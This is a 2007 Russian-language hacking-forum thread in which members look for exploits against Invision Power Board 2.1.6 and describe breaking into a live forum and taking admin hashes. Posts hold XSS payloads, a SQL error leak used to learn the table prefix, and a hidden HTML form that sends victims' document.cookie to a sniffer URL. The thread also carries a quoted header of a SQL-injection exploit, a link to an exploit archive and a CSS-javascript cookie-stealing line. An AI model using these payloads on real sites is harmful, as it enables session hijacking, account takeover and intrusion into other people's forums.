Сплойт свежий для IPB 2.1.6
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Сплойт свежий для IPB 2.1.6 - 2007-07-10 23:51:40.220000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
вопрос тупой, согласен, кто же такое бесплатно скажет, но все-таки, хотя бы намекните, где искать? Плз[sm=aj.gif]
|
|
|
|
|
RE: Сплойт свежий для IPB 2.1.6 - 2007-07-11 00:18:05.986666
|
|
|
ViD0K
Сообщений: 134
Оценки: 0
Присоединился: 2007-07-10 19:57:57.680000
|
Попробуй здесь и здесь
|
|
|
|
|
RE: Сплойт свежий для IPB 2.1.6 - 2007-07-11 00:20:30.486666
|
|
|
ViD0K
Сообщений: 134
Оценки: 0
Присоединился: 2007-07-10 19:57:57.680000
|
А так тебе google в руки!;)
|
|
|
|
|
RE: Сплойт свежий для IPB 2.1.6 - 2007-07-11 01:12:47.800000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Неа, пишет Forum unvulnerable на все сплойты. Но почему-то типо тырит хэш по ID. Бред какой-то
Причом хэш какой-то левый - сравнивал со своим, т.к. предварителльно зарегился
|
|
|
|
|
RE: Сплойт свежий для IPB 2.1.6 - 2007-07-11 10:30:46.220000
|
|
|
Skull_roman
Сообщений: 130
Оценки: 0
Присоединился: 2007-01-10 16:16:17.413333
|
Если будет работать то скажишь !!!:) Ок ???
|
|
|
|
|
RE: Сплойт свежий для IPB 2.1.6 - 2007-07-11 10:56:56.810000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Снифануть чтоли? Это я не умею.
Мне бы сплойтик какойнить на перле, а то те что в паблике уже все пропатчены
|
|
|
|
|
RE: Сплойт свежий для IPB 2.1.6 - 2007-07-11 11:15:49.593333
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
О, нашел.
http://server/forum/admin.php?phpinfo=<script>alert()</script>
Только теперь можно и не дождаца админа, а так работаит
|
|
|
|
|
RE: Сплойт свежий для IPB 2.1.6 - 2007-07-11 15:13:36.303333
|
|
|
Skull_roman
Сообщений: 130
Оценки: 0
Присоединился: 2007-01-10 16:16:17.413333
|
Pashkela спасиб те !!! ОГРОМНОЕ !!!
|
|
|
|
|
RE: Сплойт свежий для IPB 2.1.6 - 2007-07-11 15:20:25.340000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
quote:
ORIGINAL: Skull_roman
Pashkela спасиб те !!! ОГРОМНОЕ !!!
Чо помогло штоли?:) Колись, милай, колись
|
|
|
|
|
RE: Сплойт свежий для IPB 2.1.6 - 2007-07-11 15:26:37.790000
|
|
|
Skull_roman
Сообщений: 130
Оценки: 0
Присоединился: 2007-01-10 16:16:17.413333
|
Надо сесси админа [:(]
А так все оК !
не я щас наверно буду писать свой эксплоит под…
|
|
|
|
|
RE: Сплойт свежий для IPB 2.1.6 - 2007-07-11 16:00:48.916666
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Если напишешь - сорцы в студию! Ну или в личку мяукни
|
|
|
|
|
RE: Сплойт свежий для IPB 2.1.6 - 2007-07-12 12:22:21.546666
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Короче задался я целью найти форум не пропатченый от RST. Сел в гугл, забил "IPB форум" и где-то на 10 страничке нашел бажный. Похекал его, поимел хеши и соли 3-х админов, пропассвордипро - хрен, пароль не только из цифр. Ладно, полез в оперу, зарегился тама, меняю в кукисах ID на админский, хеш соответственно тоже. Закрываю Оперу, открываю Оперу, F5 - так ведь по идее должен зайти как Админ? А он в итоге обнуляет все и делает меня опять гостем. В общем вопрос - если таки есть легальные хеш, соль и ай-ди админа, что можно таки сделать? И что я делаю неправильно?
У меня в голове только один вариант остался - ждать появления админа на сцайте и тырить сессию.
|
|
|
|
|
RE: Сплойт свежий для IPB 2.1.6 - 2007-07-12 19:45:35.916666
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Вот еще нарыл:
запрос такой:
/forum/index.php?act=Online&st=-1
Ответ сервера:
mySQL query error: SELECT * FROM ibf_sessions s WHERE s.running_time > 1184253970 ORDER BY running_time desc LIMIT -1,25
SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-1,25' at line 1
SQL error code:
Date: 12.7.2007, 8:41
Таким образом узнал префикс.
Как можно использовать эту ошибочку?
|
|
|
|
|
RE: Сплойт свежий для IPB 2.1.6 - 2007-07-12 19:56:42.760000
|
|
|
Yujin Belford
Сообщений: 4
Оценки: 0
Присоединился: 2007-07-12 00:14:45.060000
|
мне тоже интересно узнать, что дальше с этим делать.
p.s. сплойт работает на 2.1.7
|
|
|
|
|
RE: Сплойт свежий для IPB 2.1.6 - 2007-07-12 21:12:39.960000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Нашел. Это:
"Пассивная XSS" - это XSS нападение, которое может инициировать нападавший только сам для себя. Т.е. например он может послать снифферу только свои куки, что конечно же не является какой-либо угрозой для остальных лиц форума.
Но тем не менее это один из "косяков" форума. Говоря другими словами, если форум пропускает XSS, это является его недоработкой.
Симптомы:
- Создайте новое личное сообщение
- В поле заголовка письма укажите:
Цитата
"><sсriрt>alert(ipb_md5_check);</sсriрt>
- В поле тела письма любой текст
- Нажмите "Предпросмотр"
В моем случае дырка закрыта. Хотя по идее можно снифануть отправив на предварительно созданную страничку. Блин, гемморой-то какой
|
|
|
|
|
RE: Сплойт свежий для IPB 2.1.6 - 2007-07-17 20:36:30.456666
|
|
|
Skull_roman
Сообщений: 130
Оценки: 0
Присоединился: 2007-01-10 16:16:17.413333
|
quote:
ORIGINAL: Pashkela
Симптомы:
- Создайте новое личное сообщение
- В поле заголовка письма укажите:
Цитата
"><sсriрt>alert(ipb_md5_check);</sсriрt>
- В поле тела письма любой текст
- Нажмите "Предпросмотр"
Некатит енто !!! не катит !
Я почти написал эксплоит :):D:):D
|
|
|
|
|
RE: Сплойт свежий для IPB 2.1.6 - 2007-07-18 01:13:48.190000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
quote:
ORIGINAL: Skull_roman
quote:
ORIGINAL: Pashkela
Симптомы:
- Создайте новое личное сообщение
- В поле заголовка письма укажите:
Цитата
"><sсriрt>alert(ipb_md5_check);</sсriрt>
- В поле тела письма любой текст
- Нажмите "Предпросмотр"
Некатит енто !!! не катит !
Я почти написал эксплоит :):D:):D
Хм. Ну тогда я почти стал единоличным владельцем интернета, майкрософта и еще кучи мелких компашек
|
|
|
|
|
RE: Сплойт свежий для IPB 2.1.6 - 2007-07-21 14:16:07.530000
|
|
|
Skull_roman
Сообщений: 130
Оценки: 0
Присоединился: 2007-01-10 16:16:17.413333
|
Кому надо эксплоит ????
эксплоит написанный мною http://smolevichi.moy.su/Exploits/ipb.rar — ДЕРЖИТЕ ПОКА Я ДОБРЫЙ !!!!:D:)
|
|
|
|
|
RE: Сплойт свежий для IPB 2.1.6 - 2007-07-21 14:29:00.726666
|
|
|
Skull_roman
Сообщений: 130
Оценки: 0
Присоединился: 2007-01-10 16:16:17.413333
|
Забыл сказать, он написан бод SQL инъекцию
|
|
|
|
|
RE: Сплойт свежий для IPB 2.1.6 - 2007-07-21 18:10:10.193333
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
quote:
ORIGINAL: Skull_roman
Забыл сказать, он написан бод SQL инъекцию
Не работаит "твой" сплойт от RST
|
|
|
|
|
RE: Сплойт свежий для IPB 2.1.6 - 2007-07-21 19:16:04.743333
|
|
|
sys64.dll
Сообщений: 40
Оценки: 0
Присоединился: 2007-07-15 18:34:58.500000
|
quote:
написанный мною
quote:
#!/usr/bin/perl
## Invision Power Board v2.1 <= 2.1.6 sql injection exploit by RST/GHC
## Based on LOCAL_IP bug, more info in RST/GHC Advisory#41
## http://rst.void.ru/papers/advisory41.txt
## tested on 2.1.3, 2.1.6
##
## 08.06.06
## ©oded by 1dt.w0lf
## RST/GHC
## http://rst.void.ru
## http://ghc.ru [sm=9.gif][sm=9.gif][sm=9.gif] ты бы хоть камменты удалил
Pashkela
milw0rm.com
quote:
## 08.06.06 тем более он старый
|
|
|
|
|
RE: Сплойт свежий для IPB 2.1.6 - 2007-07-22 20:20:42.476666
|
|
|
denispoc
Сообщений: 55
Оценки: 0
Присоединился: 2007-03-12 15:14:27.080000
|
quote:
ORIGINAL: Pashkela
В моем случае дырка закрыта. Хотя по идее можно снифануть отправив на предварительно созданную страничку. Блин, гемморой-то какой
<form action="http://твойфорумipb2.1.7иниже/index.php?act=msg" method="post" name="REPLIER"">
<input type="hidden" name="removeattachid" value="0" />
<input type="hidden" name="OID" value="" />
<input type="hidden" name="act" value="Msg" />
<input type="hidden" name="CODE" value="04" />
<input type="hidden" name="MODE" value="01" />
<input type="hidden" name="preview" value="Предварительный просмотр">
<input type="hidden" name="msg_title" value='"><script language="JavaScript">aa1 = new Image(); aa1.src="'">http://сниффак.gif?"+document.cookie;</script>'>
</form>
ломаешь сначала какую-нидь девочку-старожилку, а потом от ее имени шлешь админу=)
|
|
|
|
|
RE: Сплойт свежий для IPB 2.1.6 - 2007-07-23 01:59:22.870000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Это-то понятно, хотелось бы готовый .pl
А вам слабо?:)
|
|
|
|
|
|
]` style=background:url(javascript:document.images[1].src="сыллка на сниффер"+document.cookie)